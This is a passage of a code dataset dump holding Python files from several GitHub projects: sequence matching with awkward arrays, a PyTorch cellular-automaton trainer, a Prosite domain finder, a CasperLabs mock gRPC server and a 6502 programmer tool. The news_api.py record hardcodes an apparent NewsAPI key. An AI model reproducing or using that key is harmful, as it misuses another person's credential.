np.arange(0, len(content.content), content.size)\n return (starts, starts + content.size, content.content)\n else:\n return (\n np.asarray(content.starts),\n np.asarray(content.stops),\n content.content,\n )\n\n\ndef extract_pattern(pat: SeqPattern, sequences: ak.Array) -> ak.Array:\n \"\"\"Extract the pattern from the sequences to yield new sequences.\"\"\"\n\n match_res = match_pattern(pat, sequences)\n select_indices = match_res[\"seq_id\"]\n\n matched_sequences: ak.Array = sequences[select_indices] # type: ignore\n matched_events: ak.Array = matched_sequences[\"events\"] # type: ignore\n\n # we still need to subset the events for each sequence\n events_length = ak.num(matched_events)\n start_at = (\n ak.zeros_like(events_length)\n if pat.idx_start_event is None\n else match_res[\"evt_indices\"][:, pat.idx_start_event] # type: ignore\n )\n end_excl_at = (\n events_length\n if pat.idx_end_event is None\n else match_res[\"evt_indices\"][:, pat.idx_end_event] # type: ignore\n + match_res[\"evt_counts\"][:, pat.idx_end_event] # type: ignore\n )\n\n # the original events array is a ListOffsetArray or ListArray, so pull out the offsets off it\n full_starts, full_ends, full_content = get_full_offsets_n_records(\n matched_events.layout\n )\n select_starts = full_starts[select_indices] + start_at\n select_ends = full_starts[select_indices] + end_excl_at\n assert np.all(\n select_ends <= full_ends[select_indices]\n ), \"shame, your math is incorrect\"\n subset_matched_events = ak.Array(\n ak_layout.ListArray64(\n ak_layout.Index64(select_starts),\n ak_layout.Index64(select_ends),\n full_content,\n )\n )\n assert ak.is_valid(subset_matched_events)\n matched_sequences[\"events\"] = subset_matched_events\n\n return matched_sequences\n", "repo_name": "ananis25/seqmatcher", "sub_path": "src/seqmatcher/matching_jitted.py", "file_name": "matching_jitted.py", "file_ext": "py", "file_size_in_byte": 14504, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "52", "api": [{"api_name": "numba.int64", "line_number": 32, "usage_type": "attribute"}, {"api_name": "numba.int64", "line_number": 33, "usage_type": "attribute"}, {"api_name": "numpy.ndarray", "line_number": 44, "usage_type": "attribute"}, {"api_name": "numpy.ndarray", "line_number": 45, "usage_type": "attribute"}, {"api_name": "numba.experimental", "line_number": 27, "usage_type": "attribute"}, {"api_name": "numba.int64", "line_number": 63, "usage_type": "attribute"}, {"api_name": "awkward.Array", "line_number": 70, "usage_type": "attribute"}, {"api_name": "numpy.asarray", "line_number": 78, "usage_type": "call"}, {"api_name": "numpy.int64", "line_number": 78, "usage_type": "attribute"}, {"api_name": "numpy.asarray", "line_number": 79, "usage_type": "call"}, {"api_name": "numpy.int64", "line_number": 79, "usage_type": "attribute"}, {"api_name": "inspect.getsource", "line_number": 103, "usage_type": "call"}, {"api_name": "numba.typeof", "line_number": 108, "usage_type": "call"}, {"api_name": "numba.typeof", "line_number": 109, "usage_type": "call"}, {"api_name": "numba.typeof", "line_number": 110, "usage_type": "call"}, {"api_name": "numpy.zeros", "line_number": 110, "usage_type": "call"}, {"api_name": "numpy.int64", "line_number": 110, "usage_type": "attribute"}, {"api_name": "numba.typeof", "line_number": 112, "usage_type": "call"}, {"api_name": "numba.typeof", "line_number": 113, "usage_type": "call"}, {"api_name": "numba.types.FunctionType", "line_number": 114, "usage_type": "call"}, {"api_name": "numba.types", "line_number": 114, "usage_type": "attribute"}, {"api_name": "numba.bool_", "line_number": 114, "usage_type": "call"}, {"api_name": "numba.types.FunctionType", "line_number": 115, "usage_type": "call"}, {"api_name": "numba.types", "line_number": 115, "usage_type": "attribute"}, {"api_name": "numba.bool_", "line_number": 115, "usage_type": "call"}, {"api_name": "numba.types.FunctionType", "line_number": 116, "usage_type": "call"}, {"api_name": "numba.types", "line_number": 116, "usage_type": "attribute"}, {"api_name": "numba.bool_", "line_number": 117, "usage_type": "call"}, {"api_name": "numba.typeof", "line_number": 118, "usage_type": "call"}, {"api_name": "numba.int64", "line_number": 119, "usage_type": "attribute"}, {"api_name": "numba.int64", "line_number": 121, "usage_type": "attribute"}, {"api_name": "numba.jit", "line_number": 130, "usage_type": "call"}, {"api_name": "numba.int64", "line_number": 131, "usage_type": "attribute"}, {"api_name": "numpy.concatenate", "line_number": 144, "usage_type": "call"}, {"api_name": "numpy.concatenate", "line_number": 145, "usage_type": "call"}, {"api_name": "numpy.concatenate", "line_number": 146, "usage_type": "call"}, {"api_name": "awkward.Array", "line_number": 154, "usage_type": "call"}, {"api_name": "typing.Callable", "line_number": 166, "usage_type": "name"}, {"api_name": "typing.Callable", "line_number": 167, "usage_type": "name"}, {"api_name": "typing.Callable", "line_number": 168, "usage_type": "name"}, {"api_name": "numba.typed.List", "line_number": 184, "usage_type": "call"}, {"api_name": "numba.typed.List", "line_number": 185, "usage_type": "call"}, {"api_name": "numba.typed.List", "line_number": 186, "usage_type": "call"}, {"api_name": "numpy.full", "line_number": 189, "usage_type": "call"}, {"api_name": "numpy.int64", "line_number": 189, "usage_type": "attribute"}, {"api_name": "numpy.zeros", "line_number": 190, "usage_type": "call"}, {"api_name": "numpy.int64", "line_number": 190, "usage_type": "attribute"}, {"api_name": "numpy.zeros", "line_number": 191, "usage_type": "call"}, {"api_name": "numpy.int64", "line_number": 191, "usage_type": "attribute"}, {"api_name": "numpy.ndarray", "line_number": 169, "usage_type": "attribute"}, {"api_name": "numba.jit", "line_number": 263, "usage_type": "call"}, {"api_name": "awkward.layout.Content", "line_number": 351, "usage_type": "attribute"}, {"api_name": "awkward.layout", "line_number": 351, "usage_type": "name"}, {"api_name": "awkward._util.listtypes", "line_number": 357, "usage_type": "argument"}, {"api_name": "awkward.layout.RegularArray", "line_number": 360, "usage_type": "attribute"}, {"api_name": "awkward.layout", "line_number": 360, "usage_type": "name"}, {"api_name": "numpy.arange", "line_number": 361, "usage_type": "call"}, {"api_name": "numpy.asarray", "line_number": 365, "usage_type": "call"}, {"api_name": "numpy.asarray", "line_number": 366, "usage_type": "call"}, {"api_name": "awkward.Array", "line_number": 371, "usage_type": "attribute"}, {"api_name": "awkward.Array", "line_number": 377, "usage_type": "attribute"}, {"api_name": "awkward.Array", "line_number": 378, "usage_type": "attribute"}, {"api_name": "awkward.num", "line_number": 381, "usage_type": "call"}, {"api_name": "awkward.zeros_like", "line_number": 383, "usage_type": "call"}, {"api_name": "numpy.all", "line_number": 400, "usage_type": "call"}, {"api_name": "awkward.Array", "line_number": 403, "usage_type": "call"}, {"api_name": "awkward.layout.ListArray64", "line_number": 404, "usage_type": "call"}, {"api_name": "awkward.layout", "line_number": 404, "usage_type": "name"}, {"api_name": "awkward.layout.Index64", "line_number": 405, "usage_type": "call"}, {"api_name": "awkward.layout", "line_number": 405, "usage_type": "name"}, {"api_name": "awkward.layout.Index64", "line_number": 406, "usage_type": "call"}, {"api_name": "awkward.layout", "line_number": 406, "usage_type": "name"}, {"api_name": "awkward.is_valid", "line_number": 410, "usage_type": "call"}]} +{"seq_id": "2169666519", "text": "from newsapi import NewsApiClient\n\ndef get_news_for_dashboard():\n newsapi = NewsApiClient(api_key='9536ddc288774f5f9d473fceff05d46a')\n all_articles = newsapi.get_everything(q='bangladesh',\n language='en')\n\n data = all_articles[\"articles\"]\n\n\n ret = {}\n for i in range(0,8):\n temp = {}\n temp[\"source\"] = data[i][\"source\"][\"name\"]\n temp[\"title\"] = data[i][\"title\"]\n temp[\"description\"] = data[i][\"description\"]\n temp[\"url\"] = data[i][\"url\"]\n temp[\"image\"] = data[i][\"urlToImage\"]\n ret[str(i)]=temp\n\n return ret", "repo_name": "SaqibHasan057/Fake_News_ICT_App", "sub_path": "fake_news_app/library/news_api.py", "file_name": "news_api.py", "file_ext": "py", "file_size_in_byte": 615, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "52", "api": [{"api_name": "newsapi.NewsApiClient", "line_number": 4, "usage_type": "call"}, {"api_name": "newsapi.get_everything", "line_number": 5, "usage_type": "call"}]} +{"seq_id": "37779248896", "text": "import torch as th\nimport torchvision as thv\nfrom PIL import Image\nimport numpy as np\nfrom model_def import RImNN\n\n## EX DESC\n# NOTE create pool of samples initialize grid with zeros except cell in the center\n# NOTE cell's going to has all channels set to 1 except RGB\n# NOTE sample specified number of batches from the pool\n# NOTE apply update rule random number of times\n# NOTE apply L2 loss for each pixel between output img and target img to regenerate\n# NOTE replace one with the highest loss to freshly seeded sample\n# NOTE as in RNNs differentiably optimize parameters \n\nif __name__==\"__main__\":\n\n #CONSTANTS \n WIDTH = 8\n HEIGHT = 8\n CHANNEL_COUNT = 16 # RGB, A - indicate if cell alive, .. 12 <- space for nn information\n POOL_SIZE = 256\n BATCH_SIZE = 8\n\n #LOADING TARGETS\n target_img = np.array(Image.open(\"../Images/place_1.png\"))\n assert(tuple(target_img.shape) == (WIDTH, HEIGHT, 4))\n\n WIDTH, HEIGHT, CHANNEL_COUNT = target_img.shape\n assert(CHANNEL_COUNT == 4)\n\n CHANNEL_COUNT += 12\n\n target_img = np.moveaxis(target_img, 2, 0)\n target_img = target_img[None , ...]\n target_img = th.from_numpy(target_img)\n target_img = target_img.float() / 255.\n\n #CREATING POOL\n seed = th.zeros(CHANNEL_COUNT, WIDTH, HEIGHT)\n seed[3:, WIDTH//2, HEIGHT//2] = 1.0\n pool = th.repeat_interleave(seed[None, ...], POOL_SIZE, dim=0)\n pool_losses = th.rand(POOL_SIZE)\n \n #DEFINE MODEL LOSS AND OPTIMIZER \n model = RImNN(WIDTH, HEIGHT, CHANNEL_COUNT, BATCH_SIZE)\n model.train()\n loss_fn = th.nn.MSELoss()\n optimizer = th.optim.Adam(model.parameters(), lr=2e-3) # 1e-3\n\n ##DEF. TRAIN STEP\n def train_step(X):\n num = int(np.random.uniform(POOL_SIZE, 96))\n optimizer.zero_grad()\n for _ in range(num):\n X = model(X)\n loss = loss_fn(X[:, 0:4, ...], target_img)\n loss.backward()#retain_graph=True)\n\n optimizer.step() \n return X, loss\n\n #TRAINING\n def train():\n for _ in range(1800):\n indices = th.randint(0, POOL_SIZE, (BATCH_SIZE,))\n X = pool[indices, ...].clone().detach()\n X_losses = pool_losses[indices, ...].clone().detach()\n with th.no_grad():\n X_worst_index = th.argmax(X_losses)\n X[X_worst_index] = seed\n \n Y, loss = train_step(X)\n\n del X\n del X_losses\n\n pool[indices, ...] = Y\n pool_losses[indices, ...] = loss\n del indices\n\n print(f\"{loss.item()}\")\n\n #if(loss.item() <= 0.1):\n # break\n\n del Y\n del loss\n\n \n\n train()\n th.save(model.state_dict(), \"../Models/ex1Model.pth\")\n", "repo_name": "JungerBoyo/imrsim", "sub_path": "src_pth/ex1.py", "file_name": "ex1.py", "file_ext": "py", "file_size_in_byte": 2526, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "52", "api": [{"api_name": "numpy.array", "line_number": 26, "usage_type": "call"}, {"api_name": "PIL.Image.open", "line_number": 26, "usage_type": "call"}, {"api_name": "PIL.Image", "line_number": 26, "usage_type": "name"}, {"api_name": "numpy.moveaxis", "line_number": 34, "usage_type": "call"}, {"api_name": "torch.from_numpy", "line_number": 36, "usage_type": "call"}, {"api_name": "torch.zeros", "line_number": 40, "usage_type": "call"}, {"api_name": "torch.repeat_interleave", "line_number": 42, "usage_type": "call"}, {"api_name": "torch.rand", "line_number": 43, "usage_type": "call"}, {"api_name": "model_def.RImNN", "line_number": 46, "usage_type": "call"}, {"api_name": "torch.nn.MSELoss", "line_number": 48, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 48, "usage_type": "attribute"}, {"api_name": "torch.optim.Adam", "line_number": 49, "usage_type": "call"}, {"api_name": "torch.optim", "line_number": 49, "usage_type": "attribute"}, {"api_name": "numpy.random.uniform", "line_number": 53, "usage_type": "call"}, {"api_name": "numpy.random", "line_number": 53, "usage_type": "attribute"}, {"api_name": "torch.randint", "line_number": 66, "usage_type": "call"}, {"api_name": "torch.no_grad", "line_number": 69, "usage_type": "call"}, {"api_name": "torch.argmax", "line_number": 70, "usage_type": "call"}, {"api_name": "torch.save", "line_number": 93, "usage_type": "call"}]} +{"seq_id": "42954967606", "text": "#!/usr/bin/env python3\n# -*-coding: utf-8-*-\n\n#MODULES###########################################################################\n\nimport os\nimport re\nimport sys\n\nfrom Bio import SeqIO\nfrom Bio.ExPASy import Prosite, Prodoc\n\n\ndef translator(domain):\n\n \"\"\"\n This function changes the regular expression format from Prosite to the Python\n one of the string given. \n \"\"\"\n\n dom = (str(domain).upper().replace(\".\", \"\").replace(\"-\", \"\").replace(\"X\", \".\"\n\t\t).replace(\"{\", \"[^\").replace(\"}\", \"]\").replace(\"<\", \"^\").replace(\">\", \"$\"\n\t\t).replace(\"(\", \"{\").replace(\")\", \"}\"))\n return dom\n\n\ndef results(output_file, id, name, accession, description, pattern, sequence):\n\n \"\"\"\n This function writes in the output file the results if there is any match \n between the domain and the sequence. \n Arguments: output file; domain ID, name, accession, description, pattern;\n and the sequence to analyze in each case. \n \"\"\"\n\n sys.stdout = open(output_file, 'a')\n\n print(\"\\nRESULTS \"+id + \":\")\n print(\"------------------------------------------------------------------\")\n print(\"OBTAINED DOMAIN: \")\n print(\"Name: \"+name)\n print(\"Accesion: \"+accession)\n print(\"Description: \"+description)\n print(\"Found pattern: \"+pattern)\n print(\"Protein's domain: \" +\n str(re.findall(pattern, sequence)[0]).replace('\"', \"\"))\n match = re.search(pattern, sequence)\n print(\"Domain position: \" + str(match.start())+\"-\"+str(match.end()))\n print(\"------------------------------------------------------------------\\n\")\n\n\ndef no_results(output_file, id):\n\n \"\"\"\n This function prints the results if there isn't any match between the domain\n\tand the sequence. \n Arguments: output file name, domain ID\n \"\"\"\n\n sys.stdout = open(output_file, 'a')\n\n print(\"\\nRESULTS \"+id + \":\")\n print(\"---------------------------------------------------------------------\")\n print(\"No matching domain found.\")\n print(\"---------------------------------------------------------------------\")\n\n\ndef domains_finder(input_file, database, output_file):\n\t\n \"\"\"\n This function chacks sequence by sequence if there is any matched domain\n\tpresent in the prosite database (.dat). \n Arguments: file which contais the sequences, database, output_file name. \n \"\"\"\n\n check = 0\n\n with open(input_file) as handle2:\n for recordBlast in SeqIO.parse(handle2, \"fasta\"):\n check = 0\n\n # Variable which contains the sequence\n subject_seqs = str(recordBlast.seq)\n\n with open(database, 'r') as handle:\n for recordD in Prosite.parse(handle):\n\n # Variable which contains the \"translated\" domain\n a = translator(recordD.pattern)\n\n if re.search(a, subject_seqs) and recordD.pattern != \"\":\n\n results(output_file, recordBlast.id, recordD.name,\n recordD.accession, recordD.description, a, \n\t\t\t\t\t\t\t\tsubject_seqs)\n check = 1\n\n if check == 0:\n no_results(output_file, recordBlast.id)\n\n sys.stdout.close()\n sys.stdout = open(\"/dev/stdout\", \"w\")\n", "repo_name": "Andrea290799/Blast-Muscle-Prosite-Analysis", "sub_path": "PROSITE.py", "file_name": "PROSITE.py", "file_ext": "py", "file_size_in_byte": 3207, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "52", "api": [{"api_name": "sys.stdout", "line_number": 36, "usage_type": "attribute"}, {"api_name": "re.findall", "line_number": 46, "usage_type": "call"}, {"api_name": "re.search", "line_number": 47, "usage_type": "call"}, {"api_name": "sys.stdout", "line_number": 60, "usage_type": "attribute"}, {"api_name": "Bio.SeqIO.parse", "line_number": 79, "usage_type": "call"}, {"api_name": "Bio.SeqIO", "line_number": 79, "usage_type": "name"}, {"api_name": "Bio.ExPASy.Prosite.parse", "line_number": 86, "usage_type": "call"}, {"api_name": "Bio.ExPASy.Prosite", "line_number": 86, "usage_type": "name"}, {"api_name": "re.search", "line_number": 91, "usage_type": "call"}, {"api_name": "sys.stdout.close", "line_number": 101, "usage_type": "call"}, {"api_name": "sys.stdout", "line_number": 101, "usage_type": "attribute"}, {"api_name": "sys.stdout", "line_number": 102, "usage_type": "attribute"}]} +{"seq_id": "35396387807", "text": "#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nMock gRPC server (node) used in Python client's unit tests suite.\n\"\"\"\nfrom concurrent import futures\nimport time\nimport grpc\n\nfrom casperlabs_client import CasperMessage_pb2\nfrom casperlabs_client import CasperMessage_pb2_grpc\nfrom casperlabs_client import casper_pb2_grpc\nfrom casperlabs_client import empty_pb2\n\nCL_GRPC_PORT_EXTERNAL = 3477\n\nHASH = \"d9d087fe5d22dbfa1bacb57d6da8d509f7191a216cee6a971de32463ff0f284f\"\n\nSAMPLE_DOT = \"\"\"\ndigraph \"dag\" {\n rankdir=BT\n node [width=0 height=0 margin=0.03 fontsize=8]\n splines=false\n subgraph \"cluster_\" {\n label = \"\"\n \"d9d087fe5d...\" [style=filled shape=box]\n \"1_\" [style=invis shape=box]\n \"2_\" [style=invis shape=box]\n \"3_\" [style=invis shape=box]\n \"4_\" [style=invis shape=box]\n \"5_\" [style=invis shape=box]\n \"d9d087fe5d...\" -> \"1_\" [style=invis]\n \"1_\" -> \"2_\" [style=invis]\n \"2_\" -> \"3_\" [style=invis]\n \"3_\" -> \"4_\" [style=invis]\n \"4_\" -> \"5_\" [style=invis]\n }\n subgraph \"cluster_9dfcf4f851...\" {\n label = \"9dfcf4f851...\"\n \"0_9dfcf4f851...\" [style=invis shape=box]\n \"30baf73717...\" [shape=box]\n \"33c8b59ddd...\" [shape=box]\n \"9bae467c70...\" [shape=box]\n \"5736298633...\" [shape=box]\n \"7f12df896d...\" [shape=box]\n \"0_9dfcf4f851...\" -> \"30baf73717...\" [style=invis]\n \"30baf73717...\" -> \"33c8b59ddd...\" [style=invis]\n \"33c8b59ddd...\" -> \"9bae467c70...\" [style=invis]\n \"9bae467c70...\" -> \"5736298633...\" [style=invis]\n \"5736298633...\" -> \"7f12df896d...\" [style=invis]\n }\n \"7f12df896d...\" -> \"5736298633...\" [constraint=false]\n \"30baf73717...\" -> \"d9d087fe5d...\" [constraint=false]\n \"33c8b59ddd...\" -> \"30baf73717...\" [constraint=false]\n \"9bae467c70...\" -> \"33c8b59ddd...\" [constraint=false]\n \"5736298633...\" -> \"9bae467c70...\" [constraint=false]\n}\n\n\"\"\"\n\n\nclass CasperServiceServicer(casper_pb2_grpc.CasperServiceServicer):\n \"\"\"CasperService is the way for user and dApp developer to interact with the system,\n including deploying contracts, looking at the DAG and querying state.\n \"\"\"\n\n def Deploy(self, request, context):\n \"\"\"Add a deploy to the deploy pool on the node,\n to be processed during subsequent block proposals.\n \"\"\"\n context.set_code(grpc.StatusCode.OK)\n context.set_details(\"\")\n return empty_pb2.Empty()\n\n def GetBlockInfo(self, request, context):\n \"\"\"Get the block summary with extra information about finality.\n \"\"\"\n context.set_code(grpc.StatusCode.UNIMPLEMENTED)\n context.set_details(\"Method not implemented!\")\n raise NotImplementedError(\"Method not implemented!\")\n\n def StreamBlockInfos(self, request, context):\n \"\"\"Get slices of the DAG, going backwards, rank by rank.\n \"\"\"\n context.set_code(grpc.StatusCode.UNIMPLEMENTED)\n context.set_details(\"Method not implemented!\")\n raise NotImplementedError(\"Method not implemented!\")\n\n\nclass DeployServicer(CasperMessage_pb2_grpc.DeployServiceServicer):\n def DoDeploy(self, request, context):\n context.set_code(grpc.StatusCode.OK)\n context.set_details(\"\")\n return CasperMessage_pb2.DeployServiceResponse()\n\n def createBlock(self, request, context):\n context.set_code(grpc.StatusCode.OK)\n return CasperMessage_pb2.DeployServiceResponse()\n\n def showBlock(self, request, context):\n context.set_code(grpc.StatusCode.OK)\n return CasperMessage_pb2.BlockQueryResponse()\n\n def visualizeDag(self, request, context):\n \"\"\"Get DAG in DOT format.\n \"\"\"\n context.set_code(grpc.StatusCode.OK)\n b = CasperMessage_pb2.VisualizeBlocksResponse()\n b.content = SAMPLE_DOT\n return b\n\n def showMainChain(self, request, context):\n context.set_code(grpc.StatusCode.OK)\n return CasperMessage_pb2.BlockInfoWithoutTuplespace()\n\n def showBlocks(self, request, context):\n context.set_code(grpc.StatusCode.OK)\n b = CasperMessage_pb2.BlockInfoWithoutTuplespace()\n b.blockHash = HASH\n yield b\n\n def findBlockWithDeploy(self, request, context):\n context.set_code(grpc.StatusCode.OK)\n b = CasperMessage_pb2.BlockQueryResponse()\n b.status = \"SUCCESS\"\n return b\n\n def queryState(self, request, context):\n context.set_code(grpc.StatusCode.OK)\n return CasperMessage_pb2.QueryStateResponse()\n\n\n####\n\n\ndef serve():\n server = grpc.server(futures.ThreadPoolExecutor(max_workers=1))\n CasperMessage_pb2_grpc.add_DeployServiceServicer_to_server(DeployServicer(), server)\n port = \"[::]:\" + str(CL_GRPC_PORT_EXTERNAL)\n server.add_insecure_port(port)\n server.start()\n try:\n while True:\n time.sleep(60 * 60)\n except KeyboardInterrupt:\n server.stop(0)\n\n\nif __name__ == \"__main__\":\n serve()\n", "repo_name": "CasperLabs/client-py", "sub_path": "tests/mock_server.py", "file_name": "mock_server.py", "file_ext": "py", "file_size_in_byte": 4829, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 2, "dataset": "github-code", "pt": "52", "api": [{"api_name": "casperlabs_client.casper_pb2_grpc.CasperServiceServicer", "line_number": 62, "usage_type": "attribute"}, {"api_name": "casperlabs_client.casper_pb2_grpc", "line_number": 62, "usage_type": "name"}, {"api_name": "grpc.StatusCode", "line_number": 71, "usage_type": "attribute"}, {"api_name": "casperlabs_client.empty_pb2.Empty", "line_number": 73, "usage_type": "call"}, {"api_name": "casperlabs_client.empty_pb2", "line_number": 73, "usage_type": "name"}, {"api_name": "grpc.StatusCode", "line_number": 78, "usage_type": "attribute"}, {"api_name": "grpc.StatusCode", "line_number": 85, "usage_type": "attribute"}, {"api_name": "casperlabs_client.CasperMessage_pb2_grpc.DeployServiceServicer", "line_number": 90, "usage_type": "attribute"}, {"api_name": "casperlabs_client.CasperMessage_pb2_grpc", "line_number": 90, "usage_type": "name"}, {"api_name": "grpc.StatusCode", "line_number": 92, "usage_type": "attribute"}, {"api_name": "casperlabs_client.CasperMessage_pb2.DeployServiceResponse", "line_number": 94, "usage_type": "call"}, {"api_name": "casperlabs_client.CasperMessage_pb2", "line_number": 94, "usage_type": "name"}, {"api_name": "grpc.StatusCode", "line_number": 97, "usage_type": "attribute"}, {"api_name": "casperlabs_client.CasperMessage_pb2.DeployServiceResponse", "line_number": 98, "usage_type": "call"}, {"api_name": "casperlabs_client.CasperMessage_pb2", "line_number": 98, "usage_type": "name"}, {"api_name": "grpc.StatusCode", "line_number": 101, "usage_type": "attribute"}, {"api_name": "casperlabs_client.CasperMessage_pb2.BlockQueryResponse", "line_number": 102, "usage_type": "call"}, {"api_name": "casperlabs_client.CasperMessage_pb2", "line_number": 102, "usage_type": "name"}, {"api_name": "grpc.StatusCode", "line_number": 107, "usage_type": "attribute"}, {"api_name": "casperlabs_client.CasperMessage_pb2.VisualizeBlocksResponse", "line_number": 108, "usage_type": "call"}, {"api_name": "casperlabs_client.CasperMessage_pb2", "line_number": 108, "usage_type": "name"}, {"api_name": "grpc.StatusCode", "line_number": 113, "usage_type": "attribute"}, {"api_name": "casperlabs_client.CasperMessage_pb2.BlockInfoWithoutTuplespace", "line_number": 114, "usage_type": "call"}, {"api_name": "casperlabs_client.CasperMessage_pb2", "line_number": 114, "usage_type": "name"}, {"api_name": "grpc.StatusCode", "line_number": 117, "usage_type": "attribute"}, {"api_name": "casperlabs_client.CasperMessage_pb2.BlockInfoWithoutTuplespace", "line_number": 118, "usage_type": "call"}, {"api_name": "casperlabs_client.CasperMessage_pb2", "line_number": 118, "usage_type": "name"}, {"api_name": "grpc.StatusCode", "line_number": 123, "usage_type": "attribute"}, {"api_name": "casperlabs_client.CasperMessage_pb2.BlockQueryResponse", "line_number": 124, "usage_type": "call"}, {"api_name": "casperlabs_client.CasperMessage_pb2", "line_number": 124, "usage_type": "name"}, {"api_name": "grpc.StatusCode", "line_number": 129, "usage_type": "attribute"}, {"api_name": "casperlabs_client.CasperMessage_pb2.QueryStateResponse", "line_number": 130, "usage_type": "call"}, {"api_name": "casperlabs_client.CasperMessage_pb2", "line_number": 130, "usage_type": "name"}, {"api_name": "grpc.server", "line_number": 137, "usage_type": "call"}, {"api_name": "concurrent.futures.ThreadPoolExecutor", "line_number": 137, "usage_type": "call"}, {"api_name": "concurrent.futures", "line_number": 137, "usage_type": "name"}, {"api_name": "casperlabs_client.CasperMessage_pb2_grpc.add_DeployServiceServicer_to_server", "line_number": 138, "usage_type": "call"}, {"api_name": "casperlabs_client.CasperMessage_pb2_grpc", "line_number": 138, "usage_type": "name"}, {"api_name": "time.sleep", "line_number": 144, "usage_type": "call"}]} +{"seq_id": "72571981926", "text": "#!/usr/bin/python\n# -*- coding: utf-8 -*-\n\n\"\"\"Arduino-Mega-6502: Programmer and Debugger for 6502 Ben Eater inspired 8-bit Computer\nby Robert Fromm, February 2021\n\nMain program.\n\"\"\"\n\n\nimport msvcrt\nimport os\nimport threading\nimport time\n\nimport coloredlogs\n\nfrom assembly_actions import AssemblyActions\nfrom bus_actions import BusActions\nfrom help_actions import HelpActions\nfrom myprint import myprint, myprint_warning\nfrom py6502.dis6502 import dis6502\nfrom serial_actions import SerialActions\nfrom serial_thread import SerialThread\n\n\ndef kbfunc():\n \"\"\"Keypress detection. Works only on windows\n source: https://stackoverflow.com/questions/292095/polling-the-keyboard-detect-a-keypress-in-python\n\n Returns:\n int: key code or 0 if no key was pressed\n \"\"\"\n return ord(msvcrt.getch()) if msvcrt.kbhit() else 0\n\n\n# enable colored logs to ensure the colors are rendered correctly on consoles\n# (e.g. Git Bash, Windows CMD)\ncoloredlogs.install()\n\n\nclass Main():\n \"\"\"Main Function\n \"\"\"\n\n def __init__(self):\n \"\"\"Constructor.\n Defines the properties.\n \"\"\"\n self.args = HelpActions.get_args() # CLI arguments\n self.portname: str = None # Name of serial port connected to\n self.serial_thread: SerialThread = None # SerialThread of serial port\n self.assembly_file: str = None # Assembly or binary file name\n self.binary: list = None # Binary content (0x8000 to 0xFFFF) of current file\n self.disasm: dis6502 = None # Py6502 Dissambler object for Opcode line interpretation\n self.stop_event = threading.Event() # Stop event\n self.auto_single_step = False # True, if autostepping is active\n self.next_single_step_time = 0 # Next timestamp (time.time()) an auto-step has to be made\n\n def run(self):\n \"\"\"Starts the Program.\n \"\"\"\n # Select Portname\n self.portname = SerialActions.port_select(self.args)\n if self.portname is None:\n self.exit()\n return\n\n # Connect to serial port\n result = SerialActions.connecting(self.portname, self.args)\n if not result.success:\n self.exit_on_error()\n return\n self.serial_thread: SerialThread = result.serial_thread\n\n # Open Assembly File\n self.select_assembly()\n if self.assembly_file is None:\n self.exit()\n return\n\n # Print Help\n HelpActions.print_help()\n\n # Main Loop\n try:\n while not self.stop_event.wait(1e-3) and self.serial_thread.is_connected():\n key = kbfunc()\n if key:\n # ignore additional key presses\n while kbfunc():\n pass\n self.on_key_pressed(key)\n\n BusActions.update(self.serial_thread, self.disasm)\n\n # Auto stepping\n if self.auto_single_step and self.next_single_step_time < time.time():\n BusActions.send_api_single_step(self.serial_thread)\n self.next_single_step_time = time.time() + self.args.ass_delay\n\n except KeyboardInterrupt:\n pass\n\n # Exiting\n if self.serial_thread.is_connected():\n self.exit()\n else:\n self.exit_on_error()\n\n def exit(self):\n \"\"\"Stopps the program\n \"\"\"\n self.stop_event.set()\n if self.serial_thread:\n self.serial_thread.close()\n\n def exit_on_error(self):\n \"\"\"Steps the program (calls self.exit()).\n Additionaly prints \"Press any key to exit...\" and waits on keypress.\n Ensures the error message can be read before the console closes.\n \"\"\"\n self.exit()\n myprint(\"Press any key to exit...\\n\")\n msvcrt.getch()\n\n def select_assembly(self, force_dialog=False):\n \"\"\"Opens the file open dialog to select the assembly or binary file.\n If force_dialog is not set the file defines by the args is used, if exists.\n\n Args:\n force_dialog (bool, optional): Defaults to False.\n \"\"\"\n new_file = AssemblyActions.select(self.args, force_dialog)\n if new_file:\n self.assembly_file = new_file\n myprint(\"Selected File: %s\\n\" % self.assembly_file)\n self.read_binary_and_update_disam()\n\n def is_file_binary(self):\n \"\"\"Checks if file is a binary or an assembly file by the file extention.\n\n Returns:\n bool: True of binary file\n \"\"\"\n return os.path.splitext(self.assembly_file)[1] == \".bin\"\n\n def read_binary_and_update_disam(self):\n \"\"\"Reads the corresponding binary file and updates the Disassmbler object\n\n Returns:\n bool: True if reading was successfull\n \"\"\"\n result = AssemblyActions.read_bin_file(self.assembly_file)\n if result.success:\n self.binary = result.eeprom_content\n\n # EEPROM is second half of memory, starting at 0x8000.\n memory = [0]*(0x10000 - AssemblyActions.EEPROM_SIZE) + self.binary\n self.disasm = dis6502(memory)\n return result.success\n\n def assemble(self, no_warning=False):\n \"\"\"Runs the assembler on the selected file.\n\n Args:\n no_warning (bool, optional): Disable the warning of selected file is a binary.\n Defaults to False.\n\n Returns:\n bool: True, if assembly was successfull\n \"\"\"\n if self.is_file_binary():\n if not no_warning:\n myprint_warning(\"Selected file is a binary.\\n\")\n return True\n success = AssemblyActions.assemble(self.assembly_file)\n\n if success:\n self.read_binary_and_update_disam()\n return success\n\n def program(self):\n \"\"\"Programs the EEPROM\n \"\"\"\n if self.is_file_binary():\n self.read_binary_and_update_disam()\n\n self.auto_single_step = False\n AssemblyActions.flash(self.args, self.binary, self.serial_thread)\n\n def reset(self, force_autoreset=False):\n \"\"\"Resets the 6502 processor.\n Either a simple reset (setting the pin) or a full reset (stepping until first opcode fetch)\n is performed.\n Depending on force_autoreset and the args setting\n\n Args:\n force_autoreset (bool, optional): Defaults to True.\n \"\"\"\n if not self.args.simplereset or force_autoreset:\n self.auto_single_step = False\n BusActions.send_api_auto_reset(self.serial_thread)\n else:\n BusActions.send_api_reset(self.serial_thread)\n\n def single_step(self):\n \"\"\"Single steps the 6502 processor.\n Request is send.\n Arduino automatically answers with bus update.\n \"\"\"\n self.auto_single_step = False\n BusActions.send_api_single_step(self.serial_thread)\n\n def assemble_program_reset(self):\n \"\"\"Automatically 